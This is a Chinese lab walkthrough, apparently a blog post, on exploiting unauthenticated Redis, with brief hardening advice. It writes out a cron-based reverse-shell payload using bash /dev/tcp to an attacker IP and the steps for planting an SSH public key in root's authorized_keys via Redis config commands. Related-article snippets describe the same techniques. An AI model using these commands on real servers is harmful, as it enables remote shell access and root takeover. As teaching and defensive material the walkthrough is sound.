Redis未授权访问漏洞

最新推荐文章于 2024-05-08 08:00:00 发布

原创最新推荐文章于 2024-05-08 08:00:00 发布

· 243 阅读

0 ·

版权

文章标签：

#nginx #css #https #ssh #openssh

主机信息

reids-server：192.168.254.132

kali：192.168.254.135

redis-cli
redis-cli是redis命令行工具

./redis-cli -h 127.0.0.1 -p 6379

查看数据

反弹shell

127.0.0.1：6379>set shell "\n* * * * * bash -i >& /dev/tcp/192.168.254.143/1234 0>&1\n"
127.0.0.1：6379>config set dir /var/spool/cron/
127.0.0.1：6379>config set  dbfilename root
127.0.0.1：6379>save

写公钥利用私钥登录
创建密钥

ssh-keygen -t rsa

将公钥写入foo.txt

(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > foo.txt

将公钥放在建crackit里

cat /root/foo.txt | ./redis-cli -h 192.168.254.132 -x set crackit

链接redis

./resid-cli -h 192.168.254.132

设置数据库备份文件路径为/root/.ssh/

CONFIG SET dir /root/.ssh/

设置备份文件名为authorized_keys

CONFIG SET dbfilename "authorized_keys"

保存公钥成功写入

save

使用私钥去链接服务器

防御方法

1、默认只对本地开放
修改配置文件redis.conf

bind 127.0.0.1

2、添加认证密钥
修改配置文件redis.conf

requirepass  passwd

3、修改默认端口

port 63790

4、使用firewall进行限制

加入我的星球

下方查看历史文章

扫描二维码

获取更多精彩

NowSec

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

NowSec

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

通达OA inc/package/down.php接口未授权访问漏洞复现 [附POC]

薛定谔嘚喵博客

11-29

1643

通达OA 接口inc/package/down.php存在未授权访问漏洞，该漏洞源于系统对用户传入的数据过滤不严。攻击者可借助特制的HTTP请求利用该漏洞访问敏感文件，造成信息泄露。

未公开通达OA前台add.php存在未授权访问漏洞

ZeroDay001的博客

11-19

252

通达OA,一般又称通达oa移动端,通达oa系统办公软件,通达oa办公软件手机版,通达oa办公系统软件。通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常，支持单行文本，多行文本，单选，多选，下拉选择，上传图片，时间。

参与评论您还未登录，请先登录后发表或查看评论

漏洞复现之Redis未授权访问

m0_56190544的博客

09-13

2912

本文详细介绍了redis未授权访问漏洞的原理以及利用方法，供大家参考学习

Redis未授权访问漏洞复现与工具安装

Welcome To Myon'Blog !

01-11

3112

redis是一个数据库，默认端口是6379，redis默认是没有密码验证的，可以免密码登录操作，攻击者可以通过操作redis进一步控制服务器。Redis未授权访问影响版本为5.0.5以下，可以使用master/slave模式加载远程模块，通过动态链接库的方式执行任意命令。

Redis未授权访问漏洞利用

weixin_53440207的博客

03-12

690

Redis未授权访问漏洞利用

Redies未授权访问

xxxMIng的博客

12-28

396

攻击机 kali 目标机 centos 安装省略。。。启动ssh服务 kali上进行解压文件把tar.gz包进行解压 Tar zxfv tar.gz Make Make install ./redis-cli -h 192.168.232.152 Ssh-keygen -t rsa Cat /root/.ssh/...

Redis未授权访问漏洞详解（全面）

m0_64481831的博客

02-26

4327

Redis是一款内存高速缓存的数据库，是一款K-V型数据库，它的所有键值都是用字典来存储的。其中它的value支持多种数据类型，包括String、List、Set、Zset和Hash。Redis默认情况下绑定在127.0.0.1:6379，在没有进行采用相关的策略，如添加防火墙规则避免其他非信任来源ip访问，就会将Redis服务暴露在公网上；并且Redis默认情况是空密码连接在服务器以root身份运行Redis时这将导致任意用户可以访问目标服务器下未授权访问Redis以及读取Redis数据。

关于Redis未授权访问漏洞利用的介绍与修复建议

01-21

本文主要给大家介绍了关于Redis未授权访问漏洞利用的相关内容，文中对该漏洞进行了详细，并给出了相对应的修复/安全建议，下面话不多说了，来一起看看详细的介绍吧。一、漏洞介绍 Redis 默认情况下，会绑定在 0.0....

未授权访问：Redis未授权访问漏洞

qq_68163788的博客

05-08

1379

未经授权访问是指在Redis数据库中，未经过身份验证或授权的情况下访问数据库的行为。Redis是一种流行的开源内存数据库，用于存储数据并提供快速访问。如果Redis实例未经过适当的安全配置，攻击者可以利用这一漏洞，访问敏感数据，修改数据或甚至破坏数据库。未经授权访问可能导致数据泄露、数据损坏和系统崩溃等严重后果。为了防止未经授权访问，管理员应该采取必要的安全措施，例如设置访问控制列表、使用密码进行身份验证和定期更新Redis的安全配置。通过加强安全措施，可以有效防止未经授权访问对Redis数据库造成的风险。

Redis未授权访问漏洞利用姿势的五种基础姿势

weixin_74182283的博客

03-27

1192

进行一个定时任务的配置指定路径与文件名，set 一个键名叫x 后面那一堆都是他的值 \n是为了隔开其他的信息（同第一段那个意思）其中的*表示时间（年月日）这里为*表示每分钟都在执行这个任务（将数据一直反弹）后面的/bin/bashxx就是一个反弹shell的正常写法，确认反弹到的主机（将靶机的信息反弹到攻击机kali上，ip就写kali的 8888为开启监听的端口）0>& 这玩意就是将标准输入重定向到标准输出，确保都能被执行到确保交互性，反弹shell不会轻易断开。

redis攻防笔记-未授权访问漏洞复现及利用

NoooEmotion的博客

01-31

717

（1）redis绑定在 0.0.0.0:6379，且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略，直接暴露在公网；（2）没有设置密码认证（一般为空），可以免密码远程登录redis服务。

Redis未授权访问漏洞实验

qq_60256199的博客

10-09

3466

Redis是一个开源的内存数据库管理系统，它被广泛用于缓存、消息队列和实时数据分析等应用场景。Redis支持多种数据结构，包括字符串、列表、集合、有序集合和哈希表，可以通过简单的键值对方式存储和检索数据。由于其高性能和低延迟特性，Redis常用于加速数据访问，提高应用程序的响应速度。此外，Redis还提供了持久化选项，允许数据在重启后仍然可用，使其适用于各种持久性存储需求。这一特性使得Redis成为了一个非常强大的数据存储和缓存解决方案，特别适用于需要快速读写操作的应用场景。

redis未授权访问漏洞【vulhub靶场】复现

m0_55854679的博客

08-01

1408

Redis 默认情况下，会绑定在 0.0.0.0:6379，如果没有进行采用相关的策略，比如添加防火墙规则避免其他非信任来源 ip 访问等，这样将会将 Redis 服务暴露到公网上；如果在没有设置密码认证（一般为空）的情况下，会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下，利用 Redis 自身的提供的config 命令，可以进行写文件操作，攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹

Redis未授权访问漏洞利用详解

LUOBIKUN的博客

10-19

2082

redis未授权访问漏洞详解简介：复现环境搭建安装redis修改配置文件利用利用姿势1，redis写入ssh公钥，获取操作系统权限利用姿势2,直接向Web目录中写webshell利用姿势3,linux计划任务执行命令反弹shell：原理：cron介绍示例：修复建议简介： Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，并提供多种语言的API。从2010年3月15日起，Redis的开发工作由VMware主持。从2013年5月开始，Redis的

vulhub之redis篇

weixin_56306210的博客

01-22

691

vulhub之redis篇

通达OA11.4漏洞复现（未授权访问）

weixin_51716781的博客

05-10

1704

通达OA11.4漏洞复现（未授权访问）本文章仅限于渗透测试使用，如出问题与作者无关，请不要做违法操作 1：在虚拟机上安装通达OA11.4版本，查看虚拟机ip 192.168.78.159 2：访问ispirit/login_code.php 获取codeuid 如图：记住UID后面使用 3：访问/logincheck_code.php文件并使用bp抓包 4：在bp中需要修改数据:2个地方：1：修改为POST包，添加UID（注意事项：返回的包中status返回是1则成功，如果是0则失败） 5：把获取的

【vulhub】 redis

haoaaao的博客

05-01

1209

0x00 4-unacc（未授权访问） 1、介绍 redis默认端口：6379 Redis 是一个高效数据库，默认情况下，会绑定在 0.0.0.0:6379，如果没有进行采用相关的策略，比如添加防火墙规则避免其他非信任来源 ip 访问等，这样将会将 Redis 服务暴露到公网上，如果在没有设置密码认证（一般为空）的情况下，会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。 ———————————————— https://blog.youkuaiyun.com/plo

redis未授权访问漏洞

最新发布

01-10

### Redis 未授权访问漏洞解决方案与预防方法 #### 检测 Redis 未授权访问漏洞为了有效检测 Redis 实例是否存在未授权访问漏洞，可以采取以下措施： - **网络扫描工具**：使用 Nmap 或其他类似的网络安全扫描工具来识别开放的 Redis 端口，默认情况下为 6379。如果此端口对外网可见，则可能存在风险[^1]。 - **尝试连接测试**：通过命令行客户端或其他编程接口直接向目标 IP 地址发送请求并接收响应数据包；若能成功获取到服务器返回的信息而无需身份验证，则说明存在安全隐患。 ```bash redis-cli -h <target_ip> ``` #### 利用 Redis 未授权访问漏洞的风险评估一旦确认了 Redis 存在一个可被外部访问且不需要认证就能操作的情况，攻击者可能会执行如下恶意行为： - 获取敏感信息：读取配置文件、数据库备份等重要资料； - 修改键值对内容：篡改业务逻辑所需的数据存储结构； - 执行任意代码：当启用了 Lua 脚本支持功能时，可能允许远程执行系统级指令； - 进一步渗透内网环境：作为跳板机进一步探索内部资源和服务。这些潜在威胁严重违反了信息安全原则中的保密性和完整性要求，并可能导致严重的经济损失和社会影响。 #### 解决方案与防护策略针对上述提到的安全隐患，建议实施以下改进措施以增强系统的安全性： - **设置密码保护机制**：修改 `requirepass` 参数指定一个强健复杂的字符串作为登录凭证，在每次发起请求之前都需要提供正确的凭据才能继续交互过程。 ```conf requirepass your_strong_password_here ``` - **绑定本地地址监听**：除非确实有必要让公网能够触及到 Redis 服务实例，否则应当将其限定于仅限局域网内的特定主机之间通信，即把 bind 配置项设为空白或 localhost 即可实现这一目的。 ```conf bind 127.0.0.1 ::1 ``` - **启用防火墙规则控制流量进出方向**：借助 iptables/AWS Security Groups 等手段严格限制哪些源IP范围才具备合法权限去接触Redis进程所占用的那个TCP端口号上的套接字对象。 - **定期审查日志记录情况**：开启慢查询日志以及常规的操作历史追踪特性有助于及时发现异常活动迹象以便快速做出反应处理。 - **更新至最新稳定版软件发行版本**：官方团队会持续不断地修复已知缺陷和优化性能表现，因此保持应用程序处于最新的状态对于维护整体架构稳健至关重要。